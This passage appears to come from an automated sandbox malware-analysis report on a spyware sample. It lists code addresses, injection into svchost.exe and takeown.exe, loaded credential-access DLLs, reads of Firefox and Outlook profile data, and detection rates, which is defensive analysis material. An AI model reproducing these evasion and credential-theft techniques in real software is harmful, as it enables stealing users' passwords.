                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036B2FC810_2_036B2FC8
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0373EFA010_2_0373EFA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036C0E5910_2_036C0E59
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377EE2610_2_0377EE26
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377EEDB10_2_0377EEDB
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377CE9310_2_0377CE93
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036D2E9010_2_036D2E90
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0375CD1F10_2_0375CD1F
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036CAD0010_2_036CAD00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036BADE010_2_036BADE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036D8DBF10_2_036D8DBF
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036C0C0010_2_036C0C00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036B0CF210_2_036B0CF2
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03760CB510_2_03760CB5
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036AD34C10_2_036AD34C
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377132D10_2_0377132D
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0370739A10_2_0370739A
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_037612ED10_2_037612ED
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036DB2C010_2_036DB2C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036C52A010_2_036C52A0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F516C10_2_036F516C
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0378B16B10_2_0378B16B
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036AF17210_2_036AF172
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036CB1B010_2_036CB1B0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377F0E010_2_0377F0E0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_037770E910_2_037770E9
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0376F0CC10_2_0376F0CC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377F7B010_2_0377F7B0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0370563010_2_03705630
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_037716CC10_2_037716CC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377757110_2_03777571
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_037895C310_2_037895C3
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0375D5B010_2_0375D5B0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036B146010_2_036B1460
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377F43F10_2_0377F43F
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377FB7610_2_0377FB76
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03735BF010_2_03735BF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036FDBF910_2_036FDBF9
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036DFB8010_2_036DFB80
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03733A6C10_2_03733A6C
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03777A4610_2_03777A46
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377FA4910_2_0377FA49
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0376DAC610_2_0376DAC6
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03705AA010_2_03705AA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03761AA310_2_03761AA3
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036C995010_2_036C9950
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036DB95010_2_036DB950
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0375591010_2_03755910
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0372D80010_2_0372D800
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036C38E010_2_036C38E0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377FF0910_2_0377FF09
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377FFB110_2_0377FFB1
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036C1F9210_2_036C1F92
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036C9EB010_2_036C9EB0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03777D7310_2_03777D73
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036C3D4010_2_036C3D40
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03771D5A10_2_03771D5A
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036DFDC010_2_036DFDC0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03739C3210_2_03739C32
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0377FCF210_2_0377FCF2
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F11AA010_2_02F11AA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F0CB2010_2_02F0CB20
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F0AB1010_2_02F0AB10
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F0C90010_2_02F0C900
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F0AC6010_2_02F0AC60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F0AC5410_2_02F0AC54
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F013A110_2_02F013A1
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F1336010_2_02F13360
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F1335C10_2_02F1335C
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F1514010_2_02F15140
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F2B8C010_2_02F2B8C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0351E21510_2_0351E215
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0351E0F810_2_0351E0F8
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0351D67810_2_0351D678
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0351E5AC10_2_0351E5AC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 0372EA12 appears 86 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 0373F290 appears 105 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 03707E54 appears 110 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 036F5130 appears 58 times
                Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 036AB970 appears 250 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03187E54 appears 101 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0312B970 appears 248 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03175130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031AEA12 appears 86 times
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: String function: 00F97DE1 appears 35 times
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: String function: 00FB0AE3 appears 70 times
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: String function: 00FB8900 appears 42 times
                Source: arGdXDmyGJ.exe, 00000000.00000003.1233847744.0000000004183000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs arGdXDmyGJ.exe
                Source: arGdXDmyGJ.exe, 00000000.00000003.1232512778.000000000432D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs arGdXDmyGJ.exe
                Source: arGdXDmyGJ.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@7/7
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFA06A GetLastError,FormatMessageW,0_2_00FFA06A
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FE81CB AdjustTokenPrivileges,CloseHandle,0_2_00FE81CB
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FE87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00FE87E1
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00FFB3FB
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_0100EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0100EE0D
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_010083BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_010083BB
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00F94E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00F94E89
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeFile created: C:\Users\user\AppData\Local\Temp\aut9AC4.tmpJump to behavior
                Source: arGdXDmyGJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: takeown.exe, 0000000A.00000003.1613131159.0000000003025000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3702052200.0000000003051000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3702052200.0000000003004000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3702052200.0000000003025000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1620635378.000000000302F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: arGdXDmyGJ.exeVirustotal: Detection: 74%
                Source: arGdXDmyGJ.exeReversingLabs: Detection: 68%
                Source: unknownProcess created: C:\Users\user\Desktop\arGdXDmyGJ.exe "C:\Users\user\Desktop\arGdXDmyGJ.exe"
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\arGdXDmyGJ.exe"
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeProcess created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"
                Source: C:\Windows\SysWOW64\takeown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\arGdXDmyGJ.exe"Jump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeProcess created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: arGdXDmyGJ.exeStatic file information: File size 1224192 > 1048576
                Source: arGdXDmyGJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: arGdXDmyGJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: arGdXDmyGJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: arGdXDmyGJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: arGdXDmyGJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: arGdXDmyGJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: arGdXDmyGJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: takeown.pdbGCTL source: svchost.exe, 00000002.00000003.1392680906.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391395201.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1392668149.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703008425.000000000135E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: arGdXDmyGJ.exe, 00000000.00000003.1232120246.0000000004200000.00000004.00001000.00020000.00000000.sdmp, arGdXDmyGJ.exe, 00000000.00000003.1233120508.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423720111.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423720111.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1330139854.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1328248098.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1423717679.000000000331F000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.0000000003680000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.000000000381E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1426108573.00000000034CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: takeown.pdb source: svchost.exe, 00000002.00000003.1392680906.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391395201.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1392668149.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703008425.000000000135E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: arGdXDmyGJ.exe, 00000000.00000003.1232120246.0000000004200000.00000004.00001000.00020000.00000000.sdmp, arGdXDmyGJ.exe, 00000000.00000003.1233120508.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1423720111.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423720111.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1330139854.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1328248098.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, takeown.exe, 0000000A.00000003.1423717679.000000000331F000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.0000000003680000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.000000000381E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1426108573.00000000034CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: takeown.exe, 0000000A.00000002.3702052200.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3704350785.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3704031711.000000000264C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1736983581.0000000037F3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: takeown.exe, 0000000A.00000002.3702052200.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3704350785.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3704031711.000000000264C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1736983581.0000000037F3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3702330015.0000000000F3F000.00000002.00000001.01000000.00000005.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000000.1492047890.0000000000F3F000.00000002.00000001.01000000.00000005.sdmp
                Source: arGdXDmyGJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: arGdXDmyGJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: arGdXDmyGJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: arGdXDmyGJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: arGdXDmyGJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00F94B37 LoadLibraryA,GetProcAddress,0_2_00F94B37
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FB8945 push ecx; ret 0_2_00FB8958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418800 push ebx; ret 2_2_00418805
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A10F push edi; iretd 2_2_0041A11E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A113 push edi; iretd 2_2_0041A11E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408138 push es; ret 2_2_00408139
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A1C6 push edi; iretd 2_2_0041A1C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004139B1 push esp; ret 2_2_00413A0A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413A8F push es; iretd 2_2_00413A9E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401430 push ds; retf 2_2_004014D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040154E push esi; iretd 2_2_00401557
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004015BF push ds; retf 2_2_00401600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A6EB push cs; ret 2_2_0041A6EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EF2A push edi; iretd 2_2_0041EF2D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FF0 push eax; ret 2_2_00402FF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031309AD push ecx; mov dword ptr [esp], ecx2_2_031309B6
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0368225F pushad ; ret 10_2_036827F9
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036827FA pushad ; ret 10_2_036827F9
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036B09AD push ecx; mov dword ptr [esp], ecx10_2_036B09B6
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0368283D push eax; iretd 10_2_03682858
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0368135E push eax; iretd 10_2_03681369
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F10A9C push es; iretd 10_2_02F10AAB
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F20A7F push esi; retf 10_2_02F20A8F
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F20BFF push esp; iretd 10_2_02F20C00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F109BE push esp; ret 10_2_02F10A17
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F15060 push eax; retf 10_2_02F15061
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F171D3 push edi; iretd 10_2_02F171D4
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F05145 push es; ret 10_2_02F05146
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F17120 push edi; iretd 10_2_02F1712B
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F1711C push edi; iretd 10_2_02F1712B
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F176F8 push cs; ret 10_2_02F176F9
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F21420 push ecx; iretd 10_2_02F21426
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00F948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F948D7
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_01015376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_01015376
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FB3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FB3187
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
